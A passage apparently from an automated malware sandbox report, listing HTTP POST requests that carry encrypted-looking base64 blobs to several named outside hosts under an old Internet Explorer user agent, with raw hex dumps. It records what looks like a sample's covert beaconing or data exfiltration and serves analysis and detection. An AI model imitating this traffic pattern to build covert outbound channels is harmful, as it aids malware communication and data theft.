nBF5jn2mJGUFXBXjNDXWO7b/rt6r10cLAc8LHdNOjeZ/FKDprMPogJgGcYuNKLj4ZjJ4pXYsb+ED5IMPMcvoTPeo1izJhQuUJ9cRc6UGKdUJUm3gHZaNnREtYaSgcF2fYlqym8LwJ9OmuV+x3aSA+NaBPemn7+b7FbzKsbWzI/t6KPklUe5BXDIxgciCvfVbN4yipEa78ECa+oK0Fb+d/kTHB6CrHKjznCq3jMYez8vaAUXzTJ09VVA/vqcVUXOs7YH4DJgpga2UsHNU8yDo4mmGxoq3uonacTN8kpdFdsvytm3no5nqRcW5GDG69EFWwQtWr/sQcAsgDMKYsqCA7UngQsYpyimiZhOvYuSszCXxd/ynAXaBt2utSsvYCm4hCWIkeHiPkw+83AzZJ2Cb5j+zB2IYh5Rb5dxDcMY7BEOWKRBmjNQZAUM6HwlNyl2x0AzwDqZYdhH96EV6QDW5cKSkZOnZTOxWblPzgNt6XSMRZ9PFb67NwIq/pstji4n6cUOZRN2KDLDOu+FVZ+tS2mHUfV/InBk0cQ/foivi4/0M0iRhS2Sqk3JKqRLS
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 6c 42 6f 4f 57 57 58 71 49 6d 56 79 71 2b 63 64 44 42 68 32 4c 4e 34 7a 73 66 43 7a 50 52 54 75 61 5a 33 2b 79 39 75 52 43 55 7a 45 6e 4b 73 6a 30 33 32 2f 6a 64 61 42 62 4b 75 58 65 79 30 33 4d 4a 64 79 75 76 71 73 72 4d 4d 4e 6e 4a 67 30 66 79 71 65 39 2b 5a 75 55 44 73 32 69 44 4d 66 72 4c 64 6a 5a 76 74 4a 56 56 61 37 6e 6f 6b 4e 76 45 7a 77 70 45 31 4c 79 69 4d 73 5a 71 51 75 4d 75 39 4e 70 77 54 38 79 61 48 47 71 50 42 31 66 4a 36 52 66 6e 6b 5a 7a 4b 52 4c 6c 33 66 53 65 74 6b 4a 30 41 41 42 7a 78 69 77 54 7a 38 37 65 6f 7a 57 47 39 53 66 79 72 53 56 62 7a 5a 58 4d 7a 6c 5a 62 69 63 62 50 56 35 2f 2f 78 39 73 71 51 39 4a 50 65 68 73 59 45 47 50 39 71 33 6e 54 79 66 32 2f 41 46 4f 75 78 31 41 79 49 43 75 72 57 62 6d 59 34 4d 6b 6b 7a 41 4a 33 4c 7a 79 4e 4a 76 64 74 79 65 68 47 64 72 4b 43 65 36 47 61 6f 61 58 51 39 70 59 66 41 5a 44 72 7a 79 33 43 52 57 4d 32 6b 72 44 35 6c 2b 71 43 48 78 47 6b 67 36 35 51 2b 42 6c 6b 52 69 35 44 4d 6b 2f 2f 6e 52 53 53 53 32 73 4d 78 56 46 4b 30 64 64 66 30 35 70 34 75 32 67 45 56 7a 36 68 5a 4d 6a 39 64 63 32 69 38 47 4e 76 48 41 42 36 71 72 70 63 45 75 79 71 78 38 5a 72 53 39 62 4b 4b 57 4f 4f 78 42 39 34 33 44 44 50 2b 41 4d 58 78 67 59 78 2b 49 67 63 2b 62 64 42 69 73 68 79 77 6e 75 77 71 2b 62 76 2b 48 4e 63 52 54 7a 74 44 75 69 6c 73 5a 70 2b 4e 47 53 74 54 47 63 68 42 71 4f 6e 63 4e 59 44 4d 36 51 4f 64 75 43 70 30 47 44 4a 76 42 7a 31 44 50 6e 30 6a 64 6d 66 35 7a 59 39 54 42 44 44 6b 67 2b 48 33 31 6e 44 2b 4b 70 56 6d 37 4f 4b 49 53 69 4b 59 2b 4c 49 44 76 52 71 50 36 36 58 70 59 39 68 7a 70 2b 45 30 64 5a 75 44 46 58 66 33 75 77 6a 47 56 55 35 66 58 52 63 44 36 4e 30 74 79 70 36 37 35 53 66 49 65 6f 61 2f 31 45 57 42 4e 65 2f 59 76 46 67 33 6d 41 57 2f 36 72 55 51 35 53 67 56 55 3d Data Ascii: lBoOWWXqImVyq+cdDBh2LN4zsfCzPRTuaZ3+y9uRCUzEnKsj032/jdaBbKuXey03MJdyuvqsrMMNnJg0fyqe9+ZuUDs2iDMfrLdjZvtJVVa7nokNvEzwpE1LyiMsZqQuMu9NpwT8yaHGqPB1fJ6RfnkZzKRLl3fSetkJ0AABzxiwTz87eozWG9SfyrSVbzZXMzlZbicbPV5//x9sqQ9JPehsYEGP9q3nTyf2/AFOux1AyICurWbmY4MkkzAJ3LzyNJvdtyehGdrKCe6GaoaXQ9pYfAZDrzy3CRWM2krD5l+qCHxGkg65Q+BlkRi5DMk//nRSSS2sMxVFK0ddf05p4u2gEVz6hZMj9dc2i8GNvHAB6qrpcEuyqx8ZrS9bKKWOOxB943DDP+AMXxgYx+Igc+bdBishywnuwq+bv+HNcRTztDuilsZp+NGStTGchBqOncNYDM6QOduCp0GDJvBz1DPn0jdmf5zY9TBDDkg+H31nD+KpVm7OKISiKY+LIDvRqP66XpY9hzp+E0dZuDFXf3uwjGVU5fXRcD6N0typ675SfIeoa/1EWBNe/YvFg3mAW/6rUQ5SgVU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 46 56 2f 6e 61 73 64 2b 49 32 55 2f 2b 69 2f 57 39 71 30 75 35 5a 42 63 31 6d 6d 39 37 69 68 43 36 78 61 49 35 67 44 50 2f 38 42 32 4c 52 4e 75 34 45 46 45 30 4e 7a 75 61 71 68 59 6e 4c 63 6d 6e 2b 50 50 63 69 30 70 44 38 67 41 39 33 6b 78 42 33 31 65 4c 75 4f 4e 64 46 53 52 38 46 57 43 62 32 49 57 2f 56 4a 48 2b 54 4b 66 63 41 72 46 35 75 59 78 62 6b 61 58 6c 76 67 4c 63 61 61 6d 73 37 49 79 70 55 57 62 59 54 39 68 39 65 31 59 46 59 69 67 48 69 66 48 4a 74 49 67 4a 52 58 46 33 54 54 32 77 32 44 52 38 53 78 69 77 33 73 43 62 74 31 74 70 69 6c 55 52 36 6a 46 4c 59 66 4f 65 6c 69 6c 35 4e 70 6b 63 31 61 36 51 51 73 36 64 35 63 48 4c 49 44 33 31 58 36 2b 2b 6e 35 63 2b 79 53 36 46 6a 74 4a 5a 74 37 59 65 68 44 4a 44 2b 68 6e 6c 34 4e 4b 2f 68 48 58 47 32 7a 32 75 50 42 31 39 70 2f 50 39 34 42 38 6e 7a 47 34 64 6b 38 5a 66 6a 53 32 31 50 53 7a 4d 63 45 45 6d 36 7a 4e 4b 37 4a 78 4d 4d 74 30 62 69 62 65 68 4d 37 36 44 30 79 4c 55 34 65 34 75 50 4e 50 41 2b 61 62 34 4d 37 31 43 4d 74 4d 54 51 51 31 79 33 46 46 39 57 5a 49 4e 71 58 47 79 6c 73 4b 43 73 35 68 4e 73 47 75 69 78 65 48 4a 69 39 79 6c 43 77 42 39 6d 39 4a 51 35 2f 46 38 4b 79 31 73 4b 37 52 35 70 62 69 46 4d 42 41 5a 69 39 42 4c 31 35 73 33 71 37 39 32 53 70 53 6c 47 62 38 2b 6a 47 44 73 74 6e 6c 64 46 65 6c 31 47 6f 47 57 57 58 51 57 72 45 34 41 63 58 4a 49 56 4e 41 63 6e 71 4d 42 2f 71 62 6d 36 6c 50 32 4e 4f 6e 71 61 48 2f 6a 4d 7a 48 6c 32 32 30 66 79 75 34 43 34 61 52 74 76 51 4c 38 30 4c 75 42 6c 42 36 66 46 56 37 32 74 48 55 49 73 6c 68 39 43 36 42 46 63 70 75 7a 38 63 2f 5a 71 43 68 36 2b 50 4c 6f 66 73 2b 6e 38 6d 45 6f 33 75 73 4e 42 36 36 37 31 7a 44 2f 53 31 73 31 4e 61 72 34 47 7a 44 46 75 50 52 59 65 33 62 6c 6a 4c 51 34 4e 69 77 6e 67 3d 3d Data Ascii: FV/nasd+I2U/+i/W9q0u5ZBc1mm97ihC6xaI5gDP/8B2LRNu4EFE0NzuaqhYnLcmn+PPci0pD8gA93kxB31eLuONdFSR8FWCb2IW/VJH+TKfcArF5uYxbkaXlvgLcaams7IypUWbYT9h9e1YFYigHifHJtIgJRXF3TT2w2DR8Sxiw3sCbt1tpilUR6jFLYfOelil5Npkc1a6QQs6d5cHLID31X6++n5c+yS6FjtJZt7YehDJD+hnl4NK/hHXG2z2uPB19p/P94B8nzG4dk8ZfjS21PSzMcEEm6zNK7JxMMt0bibehM76D0yLU4e4uPNPA+ab4M71CMtMTQQ1y3FF9WZINqXGylsKCs5hNsGuixeHJi9ylCwB9m9JQ5/F8Ky1sK7R5pbiFMBAZi9BL15s3q792SpSlGb8+jGDstnldFel1GoGWWXQWrE4AcXJIVNAcnqMB/qbm6lP2NOnqaH/jMzHl220fyu4C4aRtvQL80LuBlB6fFV72tHUIslh9C6BFcpuz8c/ZqCh6+PLofs+n8mEo3usNB6671zD/S1s1Nar4GzDFuPRYe3bljLQ4Niwng==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 6f 41 33 61 61 51 6c 32 49 32 55 4e 67 54 62 6d 57 49 63 6b 42 79 4a 54 48 47 73 6e 62 4a 37 68 54 65 6e 53 44 72 6e 4b 59 61 55 50 54 32 6e 69 69 4e 42 54 54 67 66 52 4f 62 57 39 67 6b 59 71 71 68 4d 30 42 65 4b 66 48 66 4f 42 64 73 53 59 56 66 30 76 4e 53 4b 67 52 6c 69 6f 70 49 77 6a 2f 6d 34 5a 45 34 35 75 4d 4f 62 4a 4c 63 33 57 4b 75 6c 52 4f 7a 64 63 72 54 55 74 39 79 73 76 64 34 6f 42 52 64 2b 6c 6a 38 4b 79 48 72 64 78 4f 35 42 67 64 68 39 56 61 72 4a 7a 78 70 2f 34 38 39 36 57 58 4b 49 48 33 61 50 59 56 49 59 71 4a 7a 78 49 67 7a 35 77 45 31 50 59 46 2f 54 63 36 45 6f 4c 45 73 4b 70 33 4a 2f 6f 77 58 75 43 36 53 5a 49 34 43 51 6f 6b 38 48 4e 69 67 66 6e 71 6e 50 68 31 4a 47 33 68 68 5a 2b 6d 64 6f 38 44 4e 71 44 6b 30 66 79 66 4f 58 66 47 79 43 4a 2b 64 6a 35 79 42 47 36 42 79 4b 4c 6e 6f 4c 2b 65 37 2b 75 65 4f 32 39 6e 67 72 68 4f 65 55 6f 7a 52 4f 32 54 4d 79 53 76 71 7a 2f 6c 76 75 42 69 51 67 31 2f 42 65 57 74 32 56 44 4b 4b 51 61 61 6d 46 73 43 67 39 74 49 75 48 51 41 65 62 63 34 35 61 2b 7a 73 68 51 77 37 55 5a 75 77 63 4a 6f 53 35 67 53 38 46 56 69 54 4d 70 37 4a 46 56 55 49 55 2f 55 4b 65 45 6d 54 70 53 51 45 74 69 49 56 44 49 47 70 4c 74 61 31 6a 6b 66 6e 2b 46 37 6e 52 2f 52 61 6a 72 63 57 7a 6d 2b 4f 75 6a 6e 75 74 50 57 36 33 4a 48 2b 41 6a 56 54 5a 4e 2b 73 71 77 78 50 41 79 7a 51 35 5a 6e 58 30 72 54 65 6f 4b 5a 73 34 56 6a 6c 58 7a 43 36 51 77 6a 74 71 52 6d 56 6c 7a 54 2f 39 48 41 68 65 6b 48 6f 4c 2b 79 39 66 55 4d 42 65 43 69 35 53 37 68 6b 39 53 77 35 5a 37 4d 39 71 52 65 48 72 77 78 47 34 62 5a 77 4b 76 6e 2b 6f 45 6a 30 42 30 68 67 5a 7a 4d 2f 41 4b 34 59 39 30 64 2b 41 37 2b 51 56 47 63 68 42 6a 67 6e 71 6f 47 70 49 3d Data Ascii: oA3aaQl2I2UNgTbmWIckByJTHGsnbJ7hTenSDrnKYaUPT2niiNBTTgfRObW9gkYqqhM0BeKfHfOBdsSYVf0vNSKgRliopIwj/m4ZE45uMObJLc3WKulROzdcrTUt9ysvd4oBRd+lj8KyHrdxO5Bgdh9VarJzxp/4896WXKIH3aPYVIYqJzxIgz5wE1PYF/Tc6EoLEsKp3J/owXuC6SZI4CQok8HNigfnqnPh1JG3hhZ+mdo8DNqDk0fyfOXfGyCJ+dj5yBG6ByKLnoL+e7+ueO29ngrhOeUozRO2TMySvqz/lvuBiQg1/BeWt2VDKKQaamFsCg9tIuHQAebc45a+zshQw7UZuwcJoS5gS8FViTMp7JFVUIU/UKeEmTpSQEtiIVDIGpLta1jkfn+F7nR/RajrcWzm+OujnutPW63JH+AjVTZN+sqwxPAyzQ5ZnX0rTeoKZs4VjlXzC6QwjtqRmVlzT/9HAhekHoL+y9fUMBeCi5S7hk9Sw5Z7M9qReHrwxG4bZwKvn+oEj0B0hgZzM/AK4Y90d+A7+QVGchBjgnqoGpI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 69 42 6f 46 4f 50 34 6e 4b 6d 55 70 36 4e 30 30 79 53 39 51 45 2b 48 56 45 38 69 2b 51 56 52 69 45 6f 6a 2b 31 72 74 48 4d 69 30 5a 56 64 50 5a 2b 43 72 65 66 42 62 6e 36 4b 74 63 67 49 72 54 55 7a 30 4b 34 69 68 58 75 6e 64 70 43 58 4f 75 2f 74 56 62 2b 34 61 58 7a 77 4d 36 45 43 48 64 77 31 57 64 51 62 6a 5a 59 6e 39 2f 45 6b 46 54 45 53 46 31 35 49 72 70 77 39 55 69 50 4d 33 52 72 33 6f 36 63 76 79 63 69 74 4c 64 6a 31 69 6e 59 78 37 69 58 4d 4d 77 49 33 2b 2b 49 4e 50 5a 32 50 78 57 64 2b 2f 6a 4e 50 2b 50 72 32 76 37 49 46 5a 32 66 72 53 77 61 46 4b 72 4a 58 4e 6e 44 46 48 6c 78 76 59 33 69 6e 5a 34 71 2f 45 4b 36 45 6f 44 44 73 6c 4f 44 68 7a 54 6c 64 4c 54 6e 61 54 45 48 7a 57 41 74 79 33 39 32 6e 6a 4a 61 62 2f 37 44 5a 4c 61 58 31 67 73 65 45 76 77 42 7a 6a 42 36 7a 64 43 4e 71 47 39 44 47 76 33 37 58 31 45 41 45 38 47 6a 48 78 62 43 4b 51 34 42 54 49 52 75 2f 59 32 6a 76 4c 78 73 41 71 47 51 71 59 6e 72 77 48 41 57 49 32 58 54 77 6c 30 76 38 64 2f 70 51 6e 4f 32 2b 57 52 35 73 75 72 6f 58 50 54 6f 52 76 4e 46 79 78 30 47 6f 4d 5a 42 31 47 54 4b 35 4c 39 51 41 77 52 4a 6b 42 30 48 72 34 4b 52 6b 69 45 37 47 77 45 70 75 58 74 64 46 77 34 56 78 6d 35 39 4e 6b 79 43 2b 2f 7a 34 2f 75 50 51 58 65 59 36 75 30 30 57 37 47 6a 39 71 31 57 73 51 30 59 37 69 6d 58 43 37 43 5a 34 6c 79 50 35 33 2f 37 45 34 64 41 59 32 50 53 6e 78 68 4c 33 2f 48 64 53 62 58 47 4d 6e 37 79 36 48 61 54 48 43 78 34 38 56 71 55 78 62 42 4e 61 61 66 59 56 71 58 6f 4b 4d 75 50 75 36 6f 4d 34 4c 2f 32 4c 58 57 6f 35 75 53 78 41 33 62 2b 51 41 30 6e 56 4e 67 71 69 65 53 77 6b 79 68 44 73 42 69 7a 5a 48 31 46 70 50 79 51 49 69 6e 6e 6e 4e 45 4b 77 50 57 34 61 38 72 46 45 76 57 44 64 44 32 44 42 45 38 37 6f 4b 77 6c 4c 50 4e 66 59 74 37 61 42 55 48 45 4c 77 41 3d Data Ascii: iBoFOP4nKmUp6N00yS9QE+HVE8i+QVRiEoj+1rtHMi0ZVdPZ+CrefBbn6KtcgIrTUz0K4ihXundpCXOu/tVb+4aXzwM6ECHdw1WdQbjZYn9/EkFTESF15Irpw9UiPM3Rr3o6cvycitLdj1inYx7iXMMwI3++INPZ2PxWd+/jNP+Pr2v7IFZ2frSwaFKrJXNnDFHlxvY3inZ4q/EK6EoDDslODhzTldLTnaTEHzWAty392njJab/7DZLaX1gseEvwBzjB6zdCNqG9DGv37X1EAE8GjHxbCKQ4BTIRu/Y2jvLxsAqGQqYnrwHAWI2XTwl0v8d/pQnO2+WR5suroXPToRvNFyx0GoMZB1GTK5L9QAwRJkB0Hr4KRkiE7GwEpuXtdFw4Vxm59NkyC+/z4/uPQXeY6u00W7Gj9q1WsQ0Y7imXC7CZ4lyP53/7E4dAY2PSnxhL3/HdSbXGMn7y6HaTHCx48VqUxbBNaafYVqXoKMuPu6oM4L/2LXWo5uSxA3b+QA0nVNgqieSwkyhDsBizZH1FpPyQIinnnNEKwPW4a8rFEvWDdD2DBE87oKwlLPNfYt7aBUHELwA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 4f 74 5a 35 6d 30 34 44 50 6d 55 64 55 6b 46 4f 32 54 4b 45 61 4c 46 64 67 43 46 4f 68 30 4e 75 59 6a 44 79 52 51 59 4b 70 5a 6c 44 38 67 75 35 4b 35 57 6c 46 4d 52 6b 4f 74 6b 32 57 75 2f 42 44 77 76 4d 44 68 39 50 4a 62 70 49 62 77 2f 35 6c 50 57 64 73 7a 4e 61 6b 4e 46 73 4d 66 31 4d 2f 6a 48 49 52 78 4a 51 6b 49 6b 64 71 6d 56 55 4b 48 70 31 6a 4f 49 64 4a 4d 4b 42 73 5a 42 6e 77 76 6e 44 75 45 6e 47 35 53 61 2b 55 39 4b 47 2b 74 75 33 58 61 74 36 36 72 77 4b 62 2f 68 41 55 33 61 41 32 73 78 62 61 32 42 2b 43 77 74 67 53 6c 59 59 59 78 76 33 2f 77 50 55 65 53 41 64 30 5a 57 34 69 70 4b 47 6c 79 73 39 4e 41 6f 49 79 4b 79 4b 57 7a 4e 68 36 56 58 7a 6b 59 5a 50 67 4a 4b 63 47 45 35 45 64 5a 57 76 48 6e 71 76 35 43 36 4e 53 37 79 30 49 76 49 39 30 50 58 2f 63 65 36 4a 37 50 72 65 34 36 2b 70 6e 53 43 58 6e 55 4f 42 30 43 32 38 70 53 6c 41 71 4a 77 56 30 45 33 2b 69 32 56 42 6b 6d 68 52 48 35 45 62 66 4d 45 59 35 76 4b 6f 72 36 69 4d 47 64 43 35 57 46 59 4b 68 54 5a 68 5a 2f 34 35 59 52 2b 59 70 39 4b 6d 49 6d 53 6e 56 6d 32 4a 6d 63 79 64 35 62 73 39 78 36 44 61 49 44 63 4e 6a 43 2f 43 30 71 6c 75 69 75 31 61 44 76 65 42 6b 61 30 57 58 4b 79 54 4e 58 56 45 56 70 6b 6c 57 67 6f 55 64 6b 39 67 73 77 6c 66 63 2b 49 68 32 50 74 6f 74 32 2f 33 35 73 77 49 4a 5a 76 50 47 6c 7a 75 50 64 43 50 4b 61 64 31 49 45 4c 2f 67 67 61 45 74 47 75 35 35 31 63 2f 6c 56 6e 61 46 56 62 51 66 6c 4c 73 71 41 6b 39 54 6b 76 79 52 6d 6e 62 79 54 70 78 31 68 64 46 67 4d 77 43 33 59 56 43 76 61 4a 4c 74 4e 38 42 50 67 38 64 76 49 46 6b 30 64 6d 6c 34 2b 4e 76 56 61 7a 31 42 50 63 4e 76 4b 6c 5a 33 4a 48 52 2f 77 77 6c 51 6c 4d 6e 4a 67 33 62 4e 2b 6e 42 38 34 4e 79 32 2f 52 4a 4d 4a 6c 72 4e 62 5a 67 5a 48 59 4f 32 4c 6b 67 66 50 4b 34 79 42 57 73 6e 50 56 75 73 71 7a 37 38 43 6e 55 37 67 3d 3d Data Ascii: OtZ5m04DPmUdUkFO2TKEaLFdgCFOh0NuYjDyRQYKpZlD8gu5K5WlFMRkOtk2Wu/BDwvMDh9PJbpIbw/5lPWdszNakNFsMf1M/jHIRxJQkIkdqmVUKHp1jOIdJMKBsZBnwvnDuEnG5Sa+U9KG+tu3Xat66rwKb/hAU3aA2sxba2B+CwtgSlYYYxv3/wPUeSAd0ZW4ipKGlys9NAoIyKyKWzNh6VXzkYZPgJKcGE5EdZWvHnqv5C6NS7y0IvI90PX/ce6J7Pre46+pnSCXnUOB0C28pSlAqJwV0E3+i2VBkmhRH5EbfMEY5vKor6iMGdC5WFYKhTZhZ/45YR+Yp9KmImSnVm2Jmcyd5bs9x6DaIDcNjC/C0qluiu1aDveBka0WXKyTNXVEVpklWgoUdk9gswlfc+Ih2Ptot2/35swIJZvPGlzuPdCPKad1IEL/ggaEtGu551c/lVnaFVbQflLsqAk9TkvyRmnbyTpx1hdFgMwC3YVCvaJLtN8BPg8dvIFk0dml4+NvVaz1BPcNvKlZ3JHR/wwlQlMnJg3bN+nB84Ny2/RJMJlrNbZgZHYO2LkgfPK4yBWsnPVusqz78CnU7g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 43 77 62 69 6e 71 45 66 50 6d 56 63 35 50 43 6b 41 4c 54 70 4e 33 72 6b 36 4e 4b 66 77 52 70 41 5a 53 44 4d 72 63 57 63 53 55 38 69 6c 76 43 47 35 34 6b 7a 37 69 48 72 43 6f 6f 52 48 46 58 50 36 4b 53 64 54 42 47 41 55 63 6a 66 70 64 63 42 66 6c 61 4b 4a 66 52 4d 6a 50 37 6d 46 4c 56 68 59 56 4c 46 68 58 61 59 54 4b 42 6a 6f 6f 4a 4a 46 4e 52 2b 42 67 45 57 32 4c 61 45 32 62 65 34 54 59 6c 2b 6e 43 52 49 7a 46 79 67 36 59 57 51 37 34 4d 6e 6f 65 6c 55 72 68 75 33 4a 69 56 7a 77 64 72 59 79 33 41 6d 45 72 36 45 30 69 59 77 42 64 69 58 77 47 36 44 6e 31 6f 48 75 48 7a 56 69 37 31 31 42 47 4b 74 73 57 37 6f 75 37 5a 79 68 51 63 6c 48 50 37 58 36 7a 47 66 77 71 33 32 78 4c 79 45 6e 65 73 68 6e 4f 55 31 6f 34 42 70 78 65 71 5a 33 6e 32 6a 75 55 50 53 61 37 76 59 31 51 48 4f 2b 32 51 32 48 69 4c 6f 4a 39 69 45 7a 78 38 74 6b 44 69 64 67 33 48 43 58 30 68 75 51 59 6f 54 64 6c 36 72 51 69 48 54 59 4f 4c 4c 48 46 65 42 43 41 47 2b 76 48 79 6e 43 59 42 55 49 61 32 6e 52 57 79 77 75 62 6d 47 77 63 44 49 6a 34 58 31 56 79 42 39 6d 4d 75 4b 34 77 4b 6b 43 52 74 5a 75 31 6a 36 4c 4a 35 2f 75 4f 79 6a 41 61 6d 36 78 62 50 7a 4b 30 4c 38 55 4a 46 51 49 44 6c 43 47 33 6a 58 6a 53 5a 6d 53 63 4b 61 72 35 43 75 34 46 39 4c 6e 50 78 47 6b 38 47 56 33 66 64 54 76 6a 4f 55 32 48 4b 39 67 38 4e 43 4e 2b 57 6a 44 4d 55 4c 6a 77 79 45 58 53 74 4b 5a 56 76 73 66 43 36 63 65 34 55 31 41 37 67 6c 58 43 66 63 50 65 43 43 2f 75 4f 50 50 6a 4f 66 32 45 51 6d 65 52 6c 56 49 42 48 59 51 43 45 5a 47 74 61 76 52 32 61 33 33 79 77 36 47 71 72 5a 30 39 74 43 47 6e 37 38 6b 2f 34 52 2f 52 54 75 38 4d 56 63 42 73 31 43 2f 65 5a 76 59 34 54 32 47 4d 64 58 61 45 50 6e 61 30 78 38 32 2b 30 69 Data Ascii: CwbinqEfPmVc5PCkALTpN3rk6NKfwRpAZSDMrcWcSU8ilvCG54kz7iHrCooRHFXP6KSdTBGAUcjfpdcBflaKJfRMjP7mFLVhYVLFhXaYTKBjooJJFNR+BgEW2LaE2be4TYl+nCRIzFyg6YWQ74MnoelUrhu3JiVzwdrYy3AmEr6E0iYwBdiXwG6Dn1oHuHzVi711BGKtsW7ou7ZyhQclHP7X6zGfwq32xLyEneshnOU1o4BpxeqZ3n2juUPSa7vY1QHO+2Q2HiLoJ9iEzx8tkDidg3HCX0huQYoTdl6rQiHTYOLLHFeBCAG+vHynCYBUIa2nRWywubmGwcDIj4X1VyB9mMuK4wKkCRtZu1j6LJ5/uOyjAam6xbPzK0L8UJFQIDlCG3jXjSZmScKar5Cu4F9LnPxGk8GV3fdTvjOU2HK9g8NCN+WjDMULjwyEXStKZVvsfC6ce4U1A7glXCfcPeCC/uOPPjOf2EQmeRlVIBHYQCEZGtavR2a33yw6GqrZ09tCGn78k/4R/RTu8MVcBs1C/eZvY4T2GMdXaEPna0x82+0i
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 6e 33 4e 4e 6d 39 30 42 50 6d 58 44 67 37 6f 35 46 42 6e 6f 51 78 62 53 51 71 6d 4c 78 76 76 46 59 57 67 37 6e 56 35 5a 4a 49 48 76 30 55 39 30 66 4a 4d 47 33 41 56 74 6c 76 4a 5a 6e 32 4b 55 65 52 76 53 4d 78 6a 7a 35 46 6b 65 45 53 45 46 31 55 39 44 55 79 31 32 77 39 6d 42 76 6f 79 45 62 4b 67 59 45 69 70 42 51 5a 75 63 48 2b 59 4c 66 2b 61 33 2f 61 44 6a 34 75 41 36 5a 39 2b 5a 44 4c 6c 43 54 52 51 73 32 4b 57 70 44 4a 76 31 69 68 79 77 74 4a 37 75 48 6e 65 66 49 57 30 2b 4e 59 34 73 50 33 43 6f 67 70 77 4c 57 75 71 78 64 50 76 67 54 75 73 34 4d 50 5a 62 32 68 33 64 30 38 42 51 71 54 42 6c 71 77 74 70 68 58 50 32 41 2f 78 6b 4f 59 79 54 68 6c 74 75 53 71 4b 57 74 7a 7a 42 51 2b 58 43 2f 58 68 6e 78 6a 44 56 6c 52 79 2b 78 52 55 6a 50 47 57 2f 49 31 2f 68 77 37 51 41 4c 76 42 53 53 32 37 4d 2f 4c 69 6e 67 7a 66 6b 39 53 65 30 35 50 6b 48 55 6f 44 4d 69 6b 53 64 64 43 42 73 73 34 62 51 43 73 6e 71 32 68 35 2b 75 35 37 6f 6f 2b 2b 69 67 47 2b 70 44 31 4f 4e 59 38 4b 78 58 74 4d 69 76 77 69 4f 4a 58 65 58 72 66 35 77 42 49 66 64 55 70 62 56 6f 36 7a 76 32 50 4f 37 72 56 38 44 2f 59 70 46 48 58 6f 2f 47 43 6b 6c 58 33 7a 75 51 63 57 53 2f 39 54 78 47 77 4a 75 72 49 4d 52 56 61 4b 33 64 41 6c 30 4b 53 62 4e 37 2b 72 70 65 61 67 57 72 49 6e 47 47 50 44 4c 32 68 56 38 4e 75 69 6d 30 62 59 48 4f 77 72 4c 58 61 41 46 65 67 51 41 63 70 70 77 5a 50 73 70 51 56 48 4d 33 7a 55 75 49 70 56 43 73 69 34 67 72 70 75 32 45 46 69 34 4a 6e 72 57 6b 77 4d 51 78 73 63 54 35 76 69 6e 43 45 47 66 37 4a 72 56 69 75 47 45 31 4b 68 35 53 39 68 45 47 2b 68 58 6a 45 79 6b 4d 35 66 74 33 42 68 66 6b 2f 54 69 38 50 32 77 46 67 2b 67 58 43 72 5a 6c 4c 4e 78 4a 30 76 6b 4b 30 6a 79 46 34 32 41 72 42 6d 59 33 56 44 70 54 79 70 70 7a 55 5a 66 76 6d 32 41 36 4b 6a 30 56 59 68 72 67 6e 53 36 Data Ascii: n3NNm90BPmXDg7o5FBnoQxbSQqmLxvvFYWg7nV5ZJIHv0U90fJMG3AVtlvJZn2KUeRvSMxjz5FkeESEF1U9DUy12w9mBvoyEbKgYEipBQZucH+YLf+a3/aDj4uA6Z9+ZDLlCTRQs2KWpDJv1ihywtJ7uHnefIW0+NY4sP3CogpwLWuqxdPvgTus4MPZb2h3d08BQqTBlqwtphXP2A/xkOYyThltuSqKWtzzBQ+XC/XhnxjDVlRy+xRUjPGW/I1/hw7QALvBSS27M/Lingzfk9Se05PkHUoDMikSddCBss4bQCsnq2h5+u57oo++igG+pD1ONY8KxXtMivwiOJXeXrf5wBIfdUpbVo6zv2PO7rV8D/YpFHXo/GCklX3zuQcWS/9TxGwJurIMRVaK3dAl0KSbN7+rpeagWrInGGPDL2hV8Nuim0bYHOwrLXaAFegQAcppwZPspQVHM3zUuIpVCsi4grpu2EFi4JnrWkwMQxscT5vinCEGf7JrViuGE1Kh5S9hEG+hXjEykM5ft3Bhfk/Ti8P2wFg+gXCrZlLNxJ0vkK0jyF42ArBmY3VDpTyppzUZfvm2A6Kj0VYhrgnS6
